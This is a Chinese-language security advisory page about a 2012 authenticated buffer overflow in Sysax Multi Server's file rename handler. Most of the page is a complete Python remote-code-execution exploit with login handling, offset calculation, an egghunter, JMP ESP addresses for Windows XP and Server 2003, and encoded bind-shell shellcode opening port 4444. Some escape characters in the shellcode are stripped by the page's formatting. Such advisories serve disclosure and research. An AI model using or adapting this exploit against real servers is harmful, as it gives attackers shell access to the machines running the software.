Sysax Multi Server “uploadfile_name1.htm”缓冲区溢出漏洞
发布日期: 2012-02-09
更新日期: 2012-02-10

受影响系统:
  Codeorigin Sysax Multi Server 5.52
  Codeorigin Sysax Multi Server 5.50
  Codeorigin Sysax Multi Server 5.25
  Codeorigin Sysax Multi Server 4.3

描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51950

Sysax Multi Server 是 Windows 平台下的 SSH2 和 FTP 服务器。

Sysax Multi Server 在实现上存在缓冲区溢出漏洞，攻击者可利用此漏洞执行任意代码（下文的测试方法需要先以有效的用户名和口令登录并取得会话 SID，因此该漏洞需要经过身份验证才能触发）。

<*来源:Craig Freyman
链接:http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html *>测试方法: -------------------------------------------------------------------------------- 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Craig Freyman ()提供了如下测试方法:#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter) #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP) #Software Versions Tested: 5.50 and 5.52 #Date Discovered: Febrary 1, 2012 #Vendor Contacted: Febrary 3, 2012 #Vendor Response: (none) #A complete description of this exploit can be found here: #http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html ########################################################################################################## import socket,sys,time,re,base64 if len(sys.argv) != 6: print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <XP or 2K3>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] password = sys.argv[4] opersys = sys.argv[5] #base64 encode the provided creds creds = base64.encodestring(user+"x0a"+password) #msfpayload windows/shell_bind_tcp LPORT=4444 R|msfencode -e x86/alpha_mixed -b "x00x2fx0a" shell = ("DNWPDNWP" "x89xe3xdaxc5xd9x73xf4x5ax4ax4ax4ax4ax4ax4a" "x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" "x75x4ax49x39x6cx58x68x6dx59x55x50x65x50x45" "x50x55x30x4ex69x39x75x55x61x39x42x61x74x4c" "x4bx51x42x50x30x6ex6bx73x62x36x6cx6ex6bx63" "x62x57x64x6cx4bx53x42x55x78x66x6fx6dx67x73" "x7ax37x56x45x61x4bx4fx45x61x6fx30x4cx6cx65" "x6cx61x71x33x4cx75x52x64x6cx45x70x79x51x38" "x4fx66x6dx63x31x58x47x7ax42x68x70x73x62x71" "x47x6cx4bx33x62x32x30x4cx4bx77x32x55x6cx36" "x61x58x50x6ex6bx71x50x62x58x6ex65x4bx70x33" "x44x61x5ax77x71x68x50x72x70x4cx4bx33x78x36" 
"x78x6ex6bx70x58x71x30x57x71x59x43x79x73x75" "x6cx43x79x6ex6bx34x74x6cx4bx47x71x6ex36x55" "x61x49x6fx56x51x6fx30x4cx6cx49x51x68x4fx34" "x4dx33x31x49x57x64x78x69x70x30x75x38x74x75" "x53x53x4dx6bx48x37x4bx71x6dx51x34x52x55x6a" "x42x33x68x4ex6bx42x78x75x74x43x31x6ex33x62" "x46x6ex6bx66x6cx32x6bx4ex6bx76x38x47x6cx77" "x71x68x53x4ex6bx65x54x4cx4bx57x71x78x50x4f" "x79x67x34x51x34x51x34x63x6bx61x4bx65x31x30" "x59x30x5ax53x61x39x6fx6dx30x33x68x31x4fx52" "x7ax6cx4bx65x42x68x6bx4cx46x63x6dx55x38x44" "x73x46x52x63x30x33x30x35x38x42x57x30x73x50" "x32x73x6fx50x54x31x78x52x6cx34x37x44x66x44" "x47x59x6fx6ex35x6ex58x6ex70x77x71x55x50x55" "x50x46x49x49x54x46x34x42x70x61x78x51x39x6f" "x70x50x6bx53x30x59x6fx49x45x50x50x50x50x36" "x30x72x70x51x50x32x70x57x30x72x70x43x58x38" "x6ax34x4fx79x4fx6bx50x79x6fx39x45x6dx59x79" "x57x50x31x49x4bx51x43x65x38x43x32x45x50x72" "x31x73x6cx6cx49x49x76x32x4ax34x50x76x36x72" "x77x45x38x5ax62x4bx6bx55x67x63x57x79x6fx38" "x55x71x43x51x47x43x58x4fx47x59x79x64x78x69" "x6fx59x6fx7ax75x36x33x70x53x51x47x65x38x61" "x64x78x6cx67x4bx69x71x49x6fx48x55x70x57x6f" "x79x49x57x63x58x42x55x50x6ex72x6dx55x31x79" "x6fx39x45x33x58x63x53x72x4dx35x34x77x70x4e" "x69x79x73x76x37x73x67x62x77x46x51x7ax56x31" "x7ax57x62x76x39x46x36x4bx52x39x6dx42x46x38" "x47x62x64x61x34x47x4cx45x51x57x71x4cx4dx47" "x34x76x44x44x50x79x56x63x30x53x74x33x64x70" "x50x53x66x42x76x52x76x53x76x76x36x30x4ex71" "x46x32x76x36x33x62x76x53x58x44x39x48x4cx57" "x4fx6ex66x69x6fx79x45x6fx79x6dx30x30x4ex32" "x76x63x76x49x6fx56x50x42x48x65x58x6dx57x45" "x4dx31x70x79x6fx38x55x4dx6bx78x70x4dx65x69" "x32x30x56x50x68x4fx56x4ax35x4dx6dx6fx6dx49" "x6fx39x45x55x6cx66x66x43x4cx56x6ax4dx50x69" "x6bx59x70x64x35x74x45x6fx4bx53x77x55x43x43" "x42x42x4fx43x5ax55x50x52x73x79x6fx68x55x41" "x41") egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x44x4ex57x50x8bxfaxafx75xeaxafx75xe7xffxe7") print "============================================================================" print " Sysax Multi Server <= 5.52 File 
Rename BoF " print " by cd1zz " print " www.pwnag3.com " print " Launching exploit against " + target + " on port " + str(port) + " for " + opersys print "============================================================================" #login with encoded creds login = "POST /scgi?sid=0&pid=dologin HTTP/1.1
" login += "Host:
" login += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
" login += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
" login += "Accept-Language: en-us,en;q=0.5
" login += "Accept-Encoding: gzip, deflate
" login += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
" login += "Proxy-Connection: keep-alive
" login += "http://"+target+"/scgi?sid=0&pid=dologin
" login += "Content-Type: application/x-www-form-urlencoded
" login += "Content-Length: 15
" login += "fd="+creds #grab the sid r = socket.socket(socket.AF_INET,socket.SOCK_STREAM) r.connect((target, port)) print "[*] Getting your SID." r.send(login + "
") page = r.recv(10240) sid = re.search(r"sid=[a-zA-Z0-9]{40}",page,re.M) if sid is None: print "[X] Could not get a SID. User and pass correct?" sys.exit(1) print "[+] Your " + sid.group(0) time.sleep(2) #find the users path to calc offset print "[*] Finding home path to calculate offset." path = re.search(r"file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]",page,re.M) time.sleep(1) #if that doesnt work, try to upload a file and check again if path is None: print "[-] There are no files in your path so I"m going to try to upload one for you." print "[-] If you don"t have rights to do this, it will fail." upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1
" upload += "Host:
" upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620
" upload += "Content-Length: 219
" upload += "-----------------------------97336096252362005297691620
" upload += "Content-Disposition: form-data; name="upload_file"; filename="file.txt"
" upload += "Content-Type: text/plain
" upload += "-----------------------------97336096252362005297691620--
" u = socket.socket(socket.AF_INET,socket.SOCK_STREAM) u.connect((target, port)) u.send(upload + "
") page = u.recv(10240) path = re.search(r"file=[a-zA-Z0-9]:\[\.a-zA-Z_0-9 ]{1,255}[\$]",page,re.M) time.sleep(2) if path is None: print "[X] It failed, you probably don"t have rights to upload." print "[X] You will need to get your path another way to properly calculate the offset." sys.exit(1) print "[+] Got it ==> " + path.group(0) time.sleep(1) #subtract --> file=c: <--- (8 bytes) from the length and minus one more for the trailing --> pathlength = len(path.group(0)) - 8 - 1 #print "[*] The path is " + str(pathlength) + " bytes long (not including C:)." if pathlength < 16: print "[X] Your path is too short, this will just DoS the server." print "[X] The path has to be at least 16 bytes long or we cant jump to our buffer." sys.exit(1) time.sleep(2) r.close() #jump back 128 bytes jumpback = "xebx80" #No DEP bypass if opersys == "2K3": #2043 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "xa4xdex8ex7c" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 if opersys == "XP": #2044 is the offset for c:A offset = 2044 - pathlength padding = "x90" * 10 junk = "x41" * (offset - len(egghunter+padding)) jump = "x53x93x42x7e" #JMP ESP buf = junk + egghunter + padding + jump + "x90"*12 + jumpback + "D"*10 #print "[*] Your offset is " + str(offset) #we"ll stuff our shell in memory first stage1 = "POST /scgi?"+str(sid.group(0))+"&pid="+shell+"mk_folder2_name1.htm HTTP/1.1
" stage1 += "Host:
" stage1 += "Referer: http://"+target+"/scgi?sid="+str(sid.group(0))+"&pid=mk_folder1_name1.htm
" stage1 += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231
" stage1 += "Content-Length: 171
" stage1 += "-----------------------------1190753071675116720811342231
" stage1 += "Content-Disposition: form-data; name="e2"
" stage1 += "file_test
" stage1 += "-----------------------------1190753071675116720811342231--
" #this is the bof stage2 = "POST /scgi?"+str(sid.group(0))+"&pid=rnmslctd1_name1.htm HTTP/1.1
" stage2 += "Host:
" stage2 += "Referrer: http://"+target+"/scgi?sid=0&pid=dologin
" stage2 += "Content-Type: multipart/form-data; boundary=---------------------------332173112583677792048824791
" stage2 += "Content-Length: 183
" stage2 += "-----------------------------332173112583677792048824791
" stage2 += "Content-Disposition: form-data; name="e2"
" stage2 += "file_"+buf+"
" stage2 += "-----------------------------332173112583677792048824791--
" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) print "[*] Sending stage 1 shell." s.send(stage1 + "
") time.sleep(3) ##Dont close the socket or we"ll lose our stage 1 shell in memory ##s.close() t = socket.socket(socket.AF_INET,socket.SOCK_STREAM) t.connect((target, port)) print "[*] Sending stage 2 BoF." t.send(stage2 + "
") print "[*] Go get your shell..." t.recv(2048)建议: -------------------------------------------------------------------------------- 厂商补丁:Codeorigin ---------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ftpshell.com/index.htmLinux Kernel “journal_unmap_buffer()”本地拒绝服务漏洞Android 平台发现新型手机病毒 Rootsmart相关资讯 Sysax Multi Server